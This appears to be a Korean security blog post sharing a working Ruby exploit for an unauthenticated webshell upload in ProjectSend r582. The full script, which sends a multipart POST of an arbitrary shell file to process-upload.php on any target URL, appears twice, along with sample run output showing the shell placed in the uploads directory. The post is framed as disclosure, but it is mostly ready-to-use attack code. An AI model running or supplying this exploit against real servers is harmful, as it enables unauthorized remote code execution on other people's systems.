[WEB HACKING] ProjectSend R582 WebShell 취약점(Exploit) [ZERODAY?]
최근 ProjectSend 라는 프레임워크에 대해 분석하던 중 Webshell 업로드가 가능한 취약점을 찾아 Exploit-db에 업로드하였으나..
알고보니 기존에 올라왔던 취약점이였습니다 =_= .. 그저 기쁜마음에 스크립트부터 작성하여 넘겼지만 찾아볼 생각을 하지 않았었네요..
그래도 간단하게 ruby 언어로 짜서 사용가능하기에 블로그 통해 공유드릴까합니다.
현재 최신버전인 r582에서도 동작하는 제로데이네요.
+ https://github.com/hahwul/ProjectSend_r582_webshell/blob/master/ProjectSend_r582_webshell.rb
+ https://github.com/hahwul/ProjectSend_r582_webshell/blob/master/README.md
# git clone https://github.com/hahwul/ProjectSend_r582_webshell.git
# --------------------------------------------------------------------
# Exploit Title: ProjectSend-r582 WebShell Upload(non-auth)
# Date: 2015-07-01
# Exploit Author: hahwul
# Blog: http://www.codeblack.net
# Vendor Homepage: http://www.projectsend.org
# Software Link: http://www.projectsend.org/download/108/
# Version: ProjectSend-r582
# Tested on: debian [wheezy]
# CVE : none
# --------------------------------------------------------------------
require "net/http"
require "uri"
require "net/http/post/multipart"
if ARGV.length != 2
puts "ProjectSend r582ver Webshell Upload"
puts "Usage: ruby ProjectSend_r582_webshell.rb [targetURL] [ShellFile]"
puts " targetURL(ex): http://127.0.0.1/vul_test/ps"
puts " ShellFile(ex): MyShell.php"
puts " Example : ~~.rb http://127.0.0.1/vul_test/ps MyShell.php"
puts " Include Gem : gem install multipart-post"
puts " exploit & code by hahwul[www.codeblack.net]"
else
target_url = ARGV[0] # http://127.0.0.1/ps/
shell_name = ARGV[1] # myshell.php
exp_url = target_url + "/process-upload.php"
uri = URI.parse(exp_url)
http = Net::HTTP.new(uri.host, uri.port)
multipartParams = {"file" => UploadIO.new(File.new(shell_name), "application/octet-stream", "shell.php")}
multipartParams = multipartParams.merge({"name"=>"shell.php"})
request = Net::HTTP::Post::Multipart.new(uri.request_uri, multipartParams)
request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
request["Cache-Control"] = "no-cache"
request["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0"
request["Connection"] = "keep-alive"
request["Accept-Language"] = "ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3"
request["Accept-Encoding"] = "gzip, deflate"
request["Pragma"] = "no-cache"
response = http.request(request)
puts "Target: "+uri.host+uri.path
puts "Exploit..."
puts "Status code: "+response.code
puts "Open WebShell Page :: "+target_url+"/upload/files/"+shell_name
end
Target: 127.0.0.1/vul_test/ps/process-upload.php
Exploit...
Status code: 302
Open WebShell Page :: http://127.0.0.1/vul_test/ps/upload/files/shell.php
Open Upload URL : http://127.0.0.1/vul_test/ProjectSend/upload/files/shell.php
WEBSHELL UPLOAD
total 12 drwxrwxrwx 2 hahwul hahwul 4096 Jul 1 01:21 . drwxrwxrwx 4 hahwul hahwul 4096 Jul 1 01:11 .. -rw-r--r-- 1 www-data www-data 66 Jul 1 01:21 shell.php -rw-r--r-- 1 www-data www-data 66 Jul 1 01:21 shell.php
알고보니 기존에 올라왔던 취약점이였습니다 =_= .. 그저 기쁜마음에 스크립트부터 작성하여 넘겼지만 찾아볼 생각을 하지 않았었네요..
그래도 간단하게 ruby 언어로 짜서 사용가능하기에 블로그 통해 공유드릴까합니다.
현재 최신버전인 r582에서도 동작하는 제로데이네요.
GIT Repo
https://github.com/hahwul/ProjectSend_r582_webshell.git+ https://github.com/hahwul/ProjectSend_r582_webshell/blob/master/ProjectSend_r582_webshell.rb
+ https://github.com/hahwul/ProjectSend_r582_webshell/blob/master/README.md
# git clone https://github.com/hahwul/ProjectSend_r582_webshell.git
Source Code
ProjectSend_r582_webshell.rb# --------------------------------------------------------------------
# Exploit Title: ProjectSend-r582 WebShell Upload(non-auth)
# Date: 2015-07-01
# Exploit Author: hahwul
# Blog: http://www.codeblack.net
# Vendor Homepage: http://www.projectsend.org
# Software Link: http://www.projectsend.org/download/108/
# Version: ProjectSend-r582
# Tested on: debian [wheezy]
# CVE : none
# --------------------------------------------------------------------
require "net/http"
require "uri"
require "net/http/post/multipart"
if ARGV.length != 2
puts "ProjectSend r582ver Webshell Upload"
puts "Usage: ruby ProjectSend_r582_webshell.rb [targetURL] [ShellFile]"
puts " targetURL(ex): http://127.0.0.1/vul_test/ps"
puts " ShellFile(ex): MyShell.php"
puts " Example : ~~.rb http://127.0.0.1/vul_test/ps MyShell.php"
puts " Include Gem : gem install multipart-post"
puts " exploit & code by hahwul[www.codeblack.net]"
else
target_url = ARGV[0] # http://127.0.0.1/ps/
shell_name = ARGV[1] # myshell.php
exp_url = target_url + "/process-upload.php"
uri = URI.parse(exp_url)
http = Net::HTTP.new(uri.host, uri.port)
multipartParams = {"file" => UploadIO.new(File.new(shell_name), "application/octet-stream", "shell.php")}
multipartParams = multipartParams.merge({"name"=>"shell.php"})
request = Net::HTTP::Post::Multipart.new(uri.request_uri, multipartParams)
request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
request["Cache-Control"] = "no-cache"
request["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0"
request["Connection"] = "keep-alive"
request["Accept-Language"] = "ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3"
request["Accept-Encoding"] = "gzip, deflate"
request["Pragma"] = "no-cache"
response = http.request(request)
puts "Target: "+uri.host+uri.path
puts "Exploit..."
puts "Status code: "+response.code
puts "Open WebShell Page :: "+target_url+"/upload/files/"+shell_name
end
Execute & Result
# ruby ProjectSend_r582_webshell.rb http://127.0.0.1/vul_test/ps shell.phpTarget: 127.0.0.1/vul_test/ps/process-upload.php
Exploit...
Status code: 302
Open WebShell Page :: http://127.0.0.1/vul_test/ps/upload/files/shell.php
Open Upload URL : http://127.0.0.1/vul_test/ProjectSend/upload/files/shell.php
WEBSHELL UPLOAD
total 12 drwxrwxrwx 2 hahwul hahwul 4096 Jul 1 01:21 . drwxrwxrwx 4 hahwul hahwul 4096 Jul 1 01:11 .. -rw-r--r-- 1 www-data www-data 66 Jul 1 01:21 shell.php -rw-r--r-- 1 www-data www-data 66 Jul 1 01:21 shell.php